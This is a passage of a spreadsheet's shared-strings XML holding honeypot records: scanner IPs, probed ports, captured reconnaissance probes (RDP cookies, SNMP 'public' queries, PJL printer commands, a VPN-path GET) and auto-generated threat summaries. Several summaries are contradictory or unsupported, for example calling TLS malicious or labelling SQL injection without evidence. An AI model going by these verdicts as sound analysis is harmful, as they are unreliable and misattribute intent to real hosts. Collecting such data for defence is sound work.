p;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_IMAP_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;9100&amp;&amp;1521&amp;&amp;161&amp;&amp;5432&amp;&amp;57047&amp;&amp;3389&amp;&amp;445&amp;&amp;1433&amp;&amp;NA&amp;&amp;51275&amp;&amp;5900&amp;&amp;53804&amp;&amp;3306&amp;&amp;6667&amp;&amp;50326&amp;&amp;56668&amp;&amp;23&amp;&amp;1080&amp;&amp;53492&amp;&amp;389&amp;&amp;110&amp;&amp;21&amp;&amp;54821&amp;&amp;49426&amp;&amp;62812&amp;&amp;443&amp;&amp;80&amp;&amp;6379&amp;&amp;50912&amp;&amp;54839&amp;&amp;58558&amp;&amp;54654</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;query&amp;&amp;request&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XYkWbVhSY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DjyGss'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Ggtwhi'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xMudcIfAp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GbJQAB'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=myGDHa'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NYgLdrEcX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IkRGNY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xZCnxI'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60492)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60502)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60508)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63144)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63150)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63158)}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MYimKothf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=edqgWd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EBrrAg'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,57682)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,57688)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,57694)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GkktwQDyh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UlHzuK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ilHSHL'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60484)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60496)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MsFZoWMxa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YnxzvY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pAElTM'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,61562)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,61576)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,61590)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HsNElkOAS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=miizhL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=idUWEo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nNSSzDeWU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=owNtpt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dYaJCM'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZPgldojSs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BmNZnd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iOEZgc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SKjzvTUGo'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63776)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,62902)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,62912)}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1fe8</t>
  </si>
  <si>
    <t>No LDAP (Lightweight Directory Access Protocol) login activity detected which is unusual. 
Possible indication of an attacker trying to exploit or scan the service for vulnerabilities. 
Lack of login attempts might suggest a reconnaissance phase by the malicious actor. &amp;&amp; This log entry suggests that an FTP connection attempted to use SSL encryption, which may be a sign of malicious activity as it could be an attempt to encrypt communication for nefarious purposes. The user is attempting to authenticate with the server, possibly trying to establish a secure connection to carry out unauthorized actions. This behavior indicates suspicious intentions from the connecting entity. &amp;&amp; Potential brute-force attack against an Oracle database, possibly attempting to gain unauthorized access by guessing login credentials. The result of the attempt is unknown as indicated by "NA", suggesting no successful login yet. Further attempts may be made to bypass security measures. &amp;&amp; An attacker is attempting to establish a secure connection for FTP authentication, likely trying to exploit vulnerabilities or gain unauthorized access to sensitive information. This could be a precursor to further malicious actions such as file transfer or data theft. The attacker's goal is to authenticate and potentially escalate privileges. &amp;&amp; The data suggests a possible authentication attempt using TLS, indicating an attempt to establish encrypted connection for malicious purposes such as scanning or exploitation of FTP vulnerability.
An attacker is trying to authenticate themselves using the AUTH command with TLS enabled.
This could be indicative of reconnaissance or prelude to more severe attacks.</t>
  </si>
  <si>
    <t>SQL Attack &amp;&amp; SSL Attack &amp;&amp; SQL Injection &amp;&amp; TLS Auth</t>
  </si>
  <si>
    <t>62f9e951c68287db7dafb583e2a9d963</t>
  </si>
  <si>
    <t>117.200.148.240</t>
  </si>
  <si>
    <t>::ffff:75c8:94f0</t>
  </si>
  <si>
    <t>0ea86a8f16ebe749f1c4a21500f90cc3</t>
  </si>
  <si>
    <t>117.209.10.34</t>
  </si>
  <si>
    <t>::ffff:75d1:a22</t>
  </si>
  <si>
    <t>f150c443cdf36a37dfaef0e584059a39</t>
  </si>
  <si>
    <t>59.178.190.133</t>
  </si>
  <si>
    <t>2004-11-30</t>
  </si>
  <si>
    <t>::ffff:3bb2:be85</t>
  </si>
  <si>
    <t>b0e734da7f3a35fb62888bc9ca933f7c</t>
  </si>
  <si>
    <t>205.210.31.134</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_IRC_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;1080&amp;&amp;1521&amp;&amp;1433&amp;&amp;3306&amp;&amp;161&amp;&amp;23&amp;&amp;110&amp;&amp;3389&amp;&amp;10675&amp;&amp;5432&amp;&amp;9100&amp;&amp;6667&amp;&amp;143&amp;&amp;50992&amp;&amp;389&amp;&amp;52406&amp;&amp;5900&amp;&amp;51142&amp;&amp;445&amp;&amp;21</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;query&amp;&amp;stshash&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.134,63010)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.134,63020)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.134,63028)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NdQeWLmmw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LIXIQc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hfpvKD'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TEqiMoeuI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ihAWmQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SNnkpf'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f86</t>
  </si>
  <si>
    <t>No notable malicious activity detected as SOCKS5 information is missing. 
This indicates that no suspicious SOCKS5 connections were logged. 
Missing SOCKS5 details make this log entry inconclusive for analysis. &amp;&amp; This indicates a potential attempt to establish a SOCKS5 connection, which could be used for proxying malicious traffic or evading detection. The "Data" field being NA suggests that no data was sent during this attempt. This behavior is often seen in reconnaissance or scanning activities. &amp;&amp; Possible malicious activity is an attempt to print information about the printer settings using a special printer control command. This could be part of a larger attack or used for reconnaissance. It's likely an unauthorized probe. &amp;&amp; A potential printer exploitation attempt, where an attacker is sending a malicious command to gain unauthorized access or control over a device. This could be part of a larger attack to install malware or gather sensitive information. The attacker may be targeting the printer's built-in functionality.</t>
  </si>
  <si>
    <t>Proxy Scan &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>cd766d786413ce640038767e22bfdbfc</t>
  </si>
  <si>
    <t>205.210.31.247</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_POP3_H3&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_MSSQL_H47&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_IRC_H13&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_RDP_H28&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;22&amp;&amp;23&amp;&amp;161&amp;&amp;143&amp;&amp;110&amp;&amp;18486&amp;&amp;NA&amp;&amp;9100&amp;&amp;5432&amp;&amp;6667&amp;&amp;389&amp;&amp;1521&amp;&amp;443&amp;&amp;1433&amp;&amp;6379&amp;&amp;1080&amp;&amp;57241&amp;&amp;54500&amp;&amp;3389&amp;&amp;57308&amp;&amp;8443&amp;&amp;3306&amp;&amp;445&amp;&amp;80&amp;&amp;52120&amp;&amp;5900&amp;&amp;49737&amp;&amp;51427&amp;&amp;50370&amp;&amp;51869&amp;&amp;55464&amp;&amp;54561&amp;&amp;61542</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;request&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,64954)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,64968)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,64972)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OFaEFOjeO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KvVnBz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jwIVWS'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65370)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65374)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65388)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eUWQmKLPc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gCSvQr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bYSvel'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qMxFPS'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60786)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60796)}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jeXghRvIz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eeWMGO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ccEurx'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60054)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60060)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,60076)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yQRRKx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RTtViNlWc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NiKALL'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65464)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65476)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.247,65482)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1ff7</t>
  </si>
  <si>
    <t>Here's the analysis of possible malicious activity: &amp;&amp; No FTP activity detected, suggesting that an attacker tried to exploit this service but was unsuccessful or did not attempt it at all. 
This indicates either no malicious traffic for the FTP service or the system is not configured to capture FTP logs.
The absence of FTP activity does not necessarily indicate normal behavior as the system's FTP capabilities may be disabled. &amp;&amp; Unknown FTP connection attempt, possibly an unauthorized access attempt. No further information is available as the FTP logs are incomplete or unavailable. The lack of data suggests that no action was taken. &amp;&amp; No log data provided, cannot analyze any activity. &amp;&amp; No malicious activity detected as SOCKS5 protocol is blocked for now but still logged. This indicates that an attempt was made to connect via SOCKS5, possibly indicating unauthorized access. Further investigation may be required. &amp;&amp; This log suggests that there was an attempt to use SOCKS5 protocol but it is unclear if this was successful or attempted maliciously as the outcome is marked as Not Available (NA). A user may have tried using a proxy service. The request was likely not fulfilled due to blocked connection. &amp;&amp; The data suggests an attempt to establish a connection using Socks5 protocol, which can be used for anonymous browsing or proxying malicious traffic. This could indicate an attacker trying to hide their IP address. The lack of activity on this service does not rule out potential future attempts. &amp;&amp; Possible unauthorized access to device management system, using default community string "public". This could indicate a scanning or reconnaissance attempt by an attacker. Attempt to retrieve system information. &amp;&amp; Possible FTP login attempt using TLS encryption, attempting authentication. Unknown user trying to authenticate via FTP. Malicious actor may be attempting to exploit vulnerable FTP server. &amp;&amp; The malicious activity indicates an attempt to establish a secure connection using TLS for authentication purposes, which could be part of a larger attack or unauthorized access attempt. This suggests an attacker may be trying to bypass security measures or gain unauthorized access. The use of TLS in this context implies a potential exploitation attempt.</t>
  </si>
  <si>
    <t>The attackers are attempting to scan and exploit various services on a network, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and others. They are using automated tools to gather information about the services, identify potential vulnerabilities, and attempt to gain unauthorized access. Some attackers are also attempting to bypass authentication mechanisms. &amp;&amp; Port Scanner &amp;&amp; Scanning Attempt &amp;&amp; Port Scanning &amp;&amp; Brute Force &amp;&amp; FTPS Attack &amp;&amp; SSL Brute</t>
  </si>
  <si>
    <t>93ee541f88d0fad468672ccad8f4cf82</t>
  </si>
  <si>
    <t>45.33.120.124</t>
  </si>
  <si>
    <t>NA&amp;&amp;prod-boron-us-central-129.li.binaryedge.ninja</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>abuseipdb&amp;&amp;SMA-LAB_IMAP_HC1</t>
  </si>
  <si>
    <t>NA&amp;&amp;143&amp;&amp;443</t>
  </si>
  <si>
    <t>El Paso</t>
  </si>
  <si>
    <t>Socorro</t>
  </si>
  <si>
    <t>5530932</t>
  </si>
  <si>
    <t>31.6546</t>
  </si>
  <si>
    <t>-106.303</t>
  </si>
  <si>
    <t>Linode</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/dana-na/nc/nc_gina_ver.txt'}}</t>
  </si>
  <si>
    <t>::ffff:2d21:787c</t>
  </si>
  <si>
    <t>A GET request is made to a specific URI, possibly attempting to download or gather sensitive information. The user agent appears to be legitimate, but the host IP suggests an external actor. This activity may indicate reconnaissance or data exfiltration attempts.</t>
  </si>
  <si>
    <t>00fcb6284baba3dfbfa3a0b8c725b46c</t>
  </si>
  <si>
    <t>113.160.185.123</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;42539&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:71a0:b97b</t>
  </si>
  <si>
    <t>Unknown activity detected for MSSQL service, possibly a connection attempt or probing of database vulnerability. No further information is available as it's marked as "not available". This could indicate an attempted attack on the database system.</t>
  </si>
  <si>
    <t>20e7af10a32f8661d624860506693ec1</t>
  </si>
  <si>
    <t>220.95.64.40</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H30</t>
  </si>
  <si>
    <t>23&amp;&amp;32426&amp;&amp;54066&amp;&amp;NA</t>
  </si>
  <si>
    <t>48</t>
  </si>
  <si>
    <t>Gyeongsangnam-do</t>
  </si>
  <si>
    <t>Gimhae-si</t>
